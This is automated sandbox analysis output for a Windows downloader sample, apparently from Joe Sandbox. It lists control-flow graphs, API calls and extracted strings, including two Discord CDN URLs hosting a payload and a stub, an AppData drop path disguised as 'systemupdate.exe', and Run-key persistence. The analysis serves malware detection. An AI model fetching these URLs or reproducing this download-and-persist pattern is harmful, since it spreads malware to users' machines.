66580->66579 66585 7ff75f8beef0 66580->66585 66588 7ff75f8bed90 66580->66588 66580->66602 66589 7ff75f8bf00d 66581->66589 66605 7ff75f8beb70 8 API calls 66581->66605 66582 7ff75f8bf036 66608 7ff75f8beb00 8 API calls 66582->66608 66586 7ff75f8bef30 66585->66586 66591 7ff75f8bf020 66585->66591 66586->66591 66603 7ff75f8beb70 8 API calls 66586->66603 66587 7ff75f8bf042 66587->66570 66588->66582 66588->66585 66588->66589 66590 7ff75f8bef50 66588->66590 66588->66591 66599 7ff75f8bee02 66588->66599 66588->66602 66606 7ff75f8beb00 8 API calls 66589->66606 66590->66591 66594 7ff75f8bef42 66590->66594 66607 7ff75f8beb00 8 API calls 66591->66607 66594->66590 66594->66591 66604 7ff75f8beb70 8 API calls 66594->66604 66597 7ff75f8beb70 8 API calls 66597->66599 66598 7ff75f8bee7d 66601 7ff75f8bee80 66598->66601 66599->66588 66599->66591 66599->66597 66599->66598 66599->66601 66600 7ff75f8beeb2 VirtualProtect 66600->66601 66601->66600 66601->66602 66602->66570 66603->66594 66604->66594 66605->66581 66606->66591 66607->66582 66608->66587 66609 7ff75f8b14be 66610 7ff75f8b153c 66609->66610 66611 7ff75f8b1571 66610->66611 66612 7ff75f8b1545 CheckTokenMembership 66610->66612 66612->66611

                            Control-flow Graph

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: InternetOpen$strlen
                            • String ID: Downloader$[ERROR] InternetOpenA failed. Error code: $[ERROR] InternetOpenUrlA failed. Error code: $[ERROR] Unable to open output file: $[LOG] Attempting to download: $[LOG] Download completed:
                            • API String ID: 3591113454-3788325054
                            • Opcode ID: 4150dfb25dc468a77205aba2d7ce6da4f396dfc95426181c3301db9b7024c21f
                            • Instruction ID: 8891b753d35d89388f64e66f676a0329e7ae2ecdd04bf852dee902807eabfcba
                            • Opcode Fuzzy Hash: 4150dfb25dc468a77205aba2d7ce6da4f396dfc95426181c3301db9b7024c21f
                            • Instruction Fuzzy Hash: F7814465B09BC688EF64FB56E8553F993A4AB49BC4F980036DD0CCB769DF2CE5408350

                            Control-flow Graph

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: malloc$ExceptionFilterUnhandled_inittermstrlen
                            • String ID: F
                            • API String ID: 3205526213-1003406523
                            • Opcode ID: 48fca0f9c51ec6a392d4bba4af0d9eb527289d3536a5fbeef566240a0bc38ab3
                            • Instruction ID: 769d2c2e51bc33e3f8d5ba2f299a6edb40b8a3fac28698498ed7ae561258d68d
                            • Opcode Fuzzy Hash: 48fca0f9c51ec6a392d4bba4af0d9eb527289d3536a5fbeef566240a0bc38ab3
                            • Instruction Fuzzy Hash: 25415E75E19A8285E740BF14E8592F9A351AF85780FDC4035DA0D8F7AADF3CB860D760

                            Control-flow Graph

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: _wmkdir
                            • String ID: cannot create directory
                            • API String ID: 2528713637-2555518002
                            • Opcode ID: c54802518c9e7459e52cee22c7d1a9f28f8b812d38d202546b679d810c06a9cb
                            • Instruction ID: df7560e12bd42fa4ce370a35678dae651370ba30613d28d134d5a5838a5c0e0e
                            • Opcode Fuzzy Hash: c54802518c9e7459e52cee22c7d1a9f28f8b812d38d202546b679d810c06a9cb
                            • Instruction Fuzzy Hash: AC318262E19EC245FA50BF69A4441F9E3A1BB95BC0F9C4030EE8D8735DEF2CE4418760

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 604 7ff75f8b14be-7ff75f8b1543 606 7ff75f8b1571-7ff75f8b157e 604->606 607 7ff75f8b1545-7ff75f8b1568 CheckTokenMembership 604->607 607->606
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: CheckMembershipToken
                            • String ID:
                            • API String ID: 1351025785-0
                            • Opcode ID: 3ca1666730983f6e47e6bd8b46a8185acceccf588d54ab14c1f925a000177e32
                            • Instruction ID: b30c0eea3c25be752e42b6d551513441e8d5c13f85d75dbf713c6eda6c227090
                            • Opcode Fuzzy Hash: 3ca1666730983f6e47e6bd8b46a8185acceccf588d54ab14c1f925a000177e32
                            • Instruction Fuzzy Hash: 04116D72B146008AF700CF65E85439E77B4B7447A8F540228DE6C9BBE8DF7DC6048B40
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID:
                            • String ID: basic_filebuf::_M_convert_to_external conversion error
                            • API String ID: 0-246983510
                            • Opcode ID: bb89181ad19e12bff7c8edc647310de023b942b22020fe0dcee449d8483e88b1
                            • Instruction ID: b4d15d7f14d6e0ba0316898ad0bd93496e8db77a40eb091cbd5d7c8365329ee0
                            • Opcode Fuzzy Hash: bb89181ad19e12bff7c8edc647310de023b942b22020fe0dcee449d8483e88b1
                            • Instruction Fuzzy Hash: E381A032A14EC185EB60AF66E8806EDA761FB45BD8F984532EE5C977ACCF38D445C310

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 0 7ff75f8cddb4-7ff75f8cde06 GetCurrentProcess GetProcessAffinityMask 1 7ff75f8cde36-7ff75f8cde3e 0->1 2 7ff75f8cde08-7ff75f8cde10 0->2 4 7ff75f8cde40-7ff75f8cde47 1->4 5 7ff75f8cde48-7ff75f8cde99 call 7ff75f8c0a50 GetCurrentProcess GetProcessAffinityMask 1->5 2->1 3 7ff75f8cde12-7ff75f8cde1f 2->3 6 7ff75f8cde20-7ff75f8cde2a 3->6 10 7ff75f8cdedf-7ff75f8cdee8 5->10 11 7ff75f8cde9b-7ff75f8cdea3 5->11 6->6 8 7ff75f8cde2c-7ff75f8cde33 6->8 8->1 12 7ff75f8cdf06-7ff75f8cdf40 call 7ff75f8c0a50 10->12 13 7ff75f8cdeea-7ff75f8cdef6 10->13 14 7ff75f8cdea5-7ff75f8cdea9 11->14 15 7ff75f8cdf00-7ff75f8cdf04 11->15 26 7ff75f8cdf75-7ff75f8cdf92 12->26 27 7ff75f8cdf42-7ff75f8cdf5a call 7ff75f8ccee0 call 7ff75f8cc7d0 12->27 18 7ff75f8cdeb0-7ff75f8cdeb5 14->18 16 7ff75f8cded0-7ff75f8cded9 GetCurrentProcess SetProcessAffinityMask 15->16 16->10 20 7ff75f8cdec2-7ff75f8cdec5 18->20 21 7ff75f8cdeb7-7ff75f8cdeb9 18->21 20->18 22 7ff75f8cdec7 20->22 21->20 24 7ff75f8cdebb-7ff75f8cdebf 21->24 22->16 24->20 33 7ff75f8cdf5c-7ff75f8cdf5f 27->33 34 7ff75f8cdf98-7ff75f8cdfc0 call 7ff75f8cd570 TlsGetValue 27->34 35 7ff75f8cdf65-7ff75f8cdf70 call 7ff75f8ccaa0 call 7ff75f8cd1d0 33->35 36 7ff75f8ce038-7ff75f8ce068 fprintf call 7ff75f8ccaa0 call 7ff75f8cd1d0 33->36 42 7ff75f8cdfc6-7ff75f8cdfe5 call 7ff75f8cd570 TlsGetValue 34->42 43 7ff75f8ce0a8 call 7ff75f8cd620 34->43 35->26 36->26 53 7ff75f8ce090-7ff75f8ce098 call 7ff75f8cd620 42->53 54 7ff75f8cdfeb-7ff75f8ce00c call 7ff75f8cd570 TlsGetValue 42->54 48 7ff75f8ce0ad-7ff75f8ce0b0 43->48 48->42 51 7ff75f8ce0b6-7ff75f998f7d 48->51 59 7ff75f998f7f-7ff75f998f8c 51->59 53->54 61 7ff75f8ce09e 53->61 67 7ff75f8ce080-7ff75f8ce088 call 7ff75f8cd620 54->67 68 7ff75f8ce00e-7ff75f8ce02d call 7ff75f8ccaa0 call 7ff75f8cd1d0 54->68 62 7ff75f998f8e-7ff75f998fb9 GetModuleHandleA 59->62 61->59 65 7ff75f998fe8-7ff75f998fee 62->65 66 7ff75f998fbb-7ff75f998fe1 GetProcAddress * 2 62->66 66->65 67->68 73 7ff75f8ce08a 67->73 68->26 73->62
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: Process$AffinityCurrentMask
                            • String ID: once %p is %ld$AddVectoredExceptionHandler$RemoveVectoredExceptionHandler$kernel32.dll
                            • API String ID: 1231390398-2209695033
                            • Opcode ID: 78040492f7c789932cbad59554d0e2ac16fc68af9ea6f82cf9bc5063c19f101b
                            • Instruction ID: 33e47a8d76ea38a44a56126c38ea7792ed1a20fe0a5611a975ad5b199effb32a
                            • Opcode Fuzzy Hash: 78040492f7c789932cbad59554d0e2ac16fc68af9ea6f82cf9bc5063c19f101b
                            • Instruction Fuzzy Hash: 93919162A19B8285FA50BF25A8412F9A3A1BF85784F8D4035ED4D8F3A9DF3CF451D320

                            Control-flow Graph

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: Current$Thread$AddressHandleProcProcessValue$CreateDuplicateEventModulePriorityabort
                            • String ID: AddVectoredExceptionHandler$RemoveVectoredExceptionHandler$kernel32.dll
                            • API String ID: 1214264455-3889795909
                            • Opcode ID: 5e5ca316a5dd528cb957c2e3e638406e9f9fd5cf8aff8c4c91fe77490861b3b7
                            • Instruction ID: e874a29adea9cd58e1f6feb6ec94027353e5a4c7f3c00eb929be1cec485eb725
                            • Opcode Fuzzy Hash: 5e5ca316a5dd528cb957c2e3e638406e9f9fd5cf8aff8c4c91fe77490861b3b7
                            • Instruction Fuzzy Hash: 55418472A05B8286E750BF65E8453A9B7A4FB44BA4F9C0235C95D873A9DF3CE085C720

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 98 7ff75f8b1c51-7ff75f8b1e9e call 7ff75f8b157f call 7ff75f983180 call 7ff75f8b164a call 7ff75f983880 call 7ff75f972fa0 call 7ff75f983180 call 7ff75f8b1430 call 7ff75f983880 call 7ff75f972fa0 call 7ff75f983180 call 7ff75f8b1430 call 7ff75f983880 call 7ff75f972fa0 call 7ff75f8b1430 * 2 call 7ff75f994540 call 7ff75f994880 call 7ff75f93f220 call 7ff75f994540 call 7ff75f994880 call 7ff75f93f220 call 7ff75f8caee0 call 7ff75f983180 call 7ff75f972fa0 call 7ff75f8e61f0 150 7ff75f8b1ea0-7ff75f8b1ed0 call 7ff75f994540 call 7ff75f93f220 98->150 151 7ff75f8b1ed5-7ff75f8b1f28 call 7ff75f994de0 call 7ff75f950e00 call 7ff75f983880 call 7ff75f948c40 98->151 160 7ff75f8b20f7-7ff75f8b22cd call 7ff75f983880 * 5 150->160 169 7ff75f8b1f2a-7ff75f8b1f73 call 7ff75f944440 call 7ff75f8d95e0 call 7ff75f8e61d0 SetFileAttributesA call 7ff75f983880 151->169 170 7ff75f8b1f78-7ff75f8b2005 call 7ff75f8d95e0 call 7ff75f994c80 call 7ff75f983880 call 7ff75f8d95e0 call 7ff75f994c80 call 7ff75f983880 call 7ff75f8b1703 151->170 169->170 199 7ff75f8b2007-7ff75f8b2037 call 7ff75f994540 call 7ff75f93f220 170->199 200 7ff75f8b203c-7ff75f8b2051 call 7ff75f8b1703 170->200 212 7ff75f8b20d3-7ff75f8b20f2 call 7ff75f983880 * 2 call 7ff75f950ea0 199->212 206 7ff75f8b2085-7ff75f8b2090 call 7ff75f8b1a4c 200->206 207 7ff75f8b2053-7ff75f8b2083 call 7ff75f994540 call 7ff75f93f220 200->207 211 7ff75f8b2095-7ff75f8b209a 206->211 207->212 214 7ff75f8b20ce 211->214 215 7ff75f8b209c-7ff75f8b20cc call 7ff75f994540 call 7ff75f93f220 211->215 212->160 214->212 215->212
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: AttributesCloseFileOpenValuestrlen
                            • String ID: APPDATA$[DEBUG] Decrypted Payload URL: $[DEBUG] Decrypted Stub URL: $[ERROR] Failed to download payload.$[ERROR] Failed to download stub.$[ERROR] Failed to retrieve AppData path.$[ERROR] Stub execution failed.$\SystemCache$\google.bin$\systemupdate.exe$https://cdn.discordapp.com/attachments/1178810474935111690/1314084840471265371/google.bin?ex=67527c60&is=67512ae0&hm=8f37e08b0f9684170b94f69a0483ca1c06a0768db952c1640cf4ff676e76255b&$https://cdn.discordapp.com/attachments/1178810474935111690/1314097351127732274/antietat.exe?ex=67528807&is=67513687&hm=a879d235e0e9ab42197adebd30a1dcd38e7d3ff1d570a766b4b5ac7a476e8dc7&
                            • API String ID: 1796351351-1238473508
                            • Opcode ID: 5684216bab689a2e5fd844c8897a3a047322cc8e07a79fca03803bba086b1ab6
                            • Instruction ID: a66966b5f72134eb58d20dcc1e79a469baa96335c6f1c5d38c79ae73798a85b4
                            • Opcode Fuzzy Hash: 5684216bab689a2e5fd844c8897a3a047322cc8e07a79fca03803bba086b1ab6
                            • Instruction Fuzzy Hash: 22C10155B19BC7A9EF14FB61E8552E8A365EB45788FC4003ADD0D4B76AEF2CE204C360

                            Control-flow Graph

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: CloseOpenValue
                            • String ID: Software\Microsoft\Windows\CurrentVersion\Run$SystemUpdate
                            • API String ID: 779948276-2516375341
                            • Opcode ID: a6fbd37789bf50f14d0cf8b3bf4aef5c31cd6dbac9869d6062af0d37f6d5f9ca
                            • Instruction ID: 086857375e2e80169b8d039206408602115bfaae1d8b1c408c06f7b13dc18fb7
                            • Opcode Fuzzy Hash: a6fbd37789bf50f14d0cf8b3bf4aef5c31cd6dbac9869d6062af0d37f6d5f9ca
                            • Instruction Fuzzy Hash: DC114232B15F4588EB10EB66EC403E97764B748B98F880239DE4C47768DF3DD1558710

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 332 7ff75f990b80-7ff75f990bbd call 7ff75f93d820 335 7ff75f990bc3-7ff75f990bd5 332->335 336 7ff75f990cb8-7ff75f990ccb 332->336 339 7ff75f990d30-7ff75f990d50 fwrite 335->339 340 7ff75f990bdb-7ff75f990beb 335->340 337 7ff75f990cd6-7ff75f990ce5 336->337 338 7ff75f990ccd-7ff75f990cd4 call 7ff75f991e30 336->338 344 7ff75f990f7f call 7ff75f8c0a50 337->344 345 7ff75f990ceb-7ff75f990cfe 337->345 338->337 355 7ff75f990d00-7ff75f990d0a 338->355 346 7ff75f990cb0 339->346 347 7ff75f990d56-7ff75f990d5f call 7ff75f98de50 339->347 342 7ff75f990bf1-7ff75f990bfe 340->342 343 7ff75f990d84-7ff75f990d89 340->343 350 7ff75f990c04-7ff75f990c0c 342->350 351 7ff75f990e58-7ff75f990e67 342->351 343->346 349 7ff75f990d8f-7ff75f990da5 343->349 359 7ff75f990f84-7ff75f990f93 344->359 346->336 354 7ff75f990d64-7ff75f990d76 347->354 369 7ff75f990da7-7ff75f990db7 call 7ff75f98de50 349->369 370 7ff75f990dbc-7ff75f990dcc 349->370 356 7ff75f990c59-7ff75f990c69 350->356 357 7ff75f990f9a-7ff75f990fa9 351->357 358 7ff75f990e6d-7ff75f990e76 351->358 354->336 355->337 362 7ff75f990d0c-7ff75f990d15 355->362 365 7ff75f990c40-7ff75f990c43 356->365 366 7ff75f990c6b-7ff75f990c78 356->366 357->344 360 7ff75f990fab-7ff75f990fce call 7ff75f998040 call 7ff75f9973b0 call 7ff75f98db30 call 7ff75f9975a0 357->360 363 7ff75f990ea0-7ff75f990ec4 call 7ff75f8e1ba0 358->363 364 7ff75f990e78 358->364 359->344 367 7ff75f990f95 call 7ff75f998040 359->367 360->336 362->337 384 7ff75f990d17-7ff75f990d2e call 7ff75f98de50 362->384 372 7ff75f990e7d-7ff75f990e8e 363->372 386 7ff75f990ec6-7ff75f990ed5 363->386 364->372 371 7ff75f990c48-7ff75f990c53 365->371 366->371 385 7ff75f990c7a-7ff75f990ca0 call 7ff75f98de50 366->385 367->357 369->370 370->346 378 7ff75f990dd2-7ff75f990dd7 370->378 371->356 377 7ff75f990d80 371->377 372->363 377->343 378->346 383 7ff75f990ddd-7ff75f990de7 378->383 388 7ff75f990ed7-7ff75f990ee1 383->388 389 7ff75f990ded-7ff75f990df4 383->389 384->337 385->349 401 7ff75f990ca6 385->401 386->372 388->359 392 7ff75f990ee7-7ff75f990eeb 388->392 394 7ff75f990e19-7ff75f990e29 389->394 398 7ff75f990f19-7ff75f990f38 call 7ff75f8e1ba0 392->398 399 7ff75f990eed 392->399 402 7ff75f990e00-7ff75f990e03 394->402 403 7ff75f990e2b-7ff75f990e38 394->403 404 7ff75f990ef1-7ff75f990f06 398->404 413 7ff75f990f3a-7ff75f990f46 398->413 399->404 401->346 407 7ff75f990e08-7ff75f990e13 402->407 403->407 412 7ff75f990e3a-7ff75f990e4f call 7ff75f98de50 403->412 404->394 407->394 411 7ff75f990f10-7ff75f990f14 407->411 411->346 412->354 413->404
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: fwrite
                            • String ID: $[LOG] Attempting to download:
                            • API String ID: 3559309478-605300840
                            • Opcode ID: 35c748a329b104d94a45aafcac4b54b25731e19889ab6158177169bb9313834d
                            • Instruction ID: dc82de05c62fb6093acc4fc62e7dbbfaac3c0e4d4cdc7615bcf4949c5e04dcdd
                            • Opcode Fuzzy Hash: 35c748a329b104d94a45aafcac4b54b25731e19889ab6158177169bb9313834d
                            • Instruction Fuzzy Hash: 9AB19122B08E8585EB55AB2AC2403BDB761FB44F84F994031EF5D577A9CF38E455C360

                            Control-flow Graph

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: CreateProcessstrlen
                            • String ID: [ERROR] Failed to execute stub. Error code: $[LOG] Executing stub with command:
                            • API String ID: 249919501-2382379905
                            • Opcode ID: c24d35469b1108bb13d269d029743976d34a8232619999a385899f6eb1c8a766
                            • Instruction ID: c715c9d1fd6d4a43983ae68f63d0b1e9dd1b3a7ec532906446c25b4a3a9bb822
                            • Opcode Fuzzy Hash: c24d35469b1108bb13d269d029743976d34a8232619999a385899f6eb1c8a766
                            • Instruction Fuzzy Hash: 9A416165B05B8699EF54EB56E8543E9A3A4FB48B88F884036DD4C8B769EF3CD1048350

                            Control-flow Graph

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: malloc
                            • String ID:
                            • API String ID: 2803490479-0
                            • Opcode ID: c47856b857129955c1b31f7fbaee8910f7bd3682f8a8d1ed22e497bb2dcc9029
                            • Instruction ID: b8d10377635bdc01cdc7c6c3bb9b283542452fc38d698317ab7fc6d27b8eda71
                            • Opcode Fuzzy Hash: c47856b857129955c1b31f7fbaee8910f7bd3682f8a8d1ed22e497bb2dcc9029
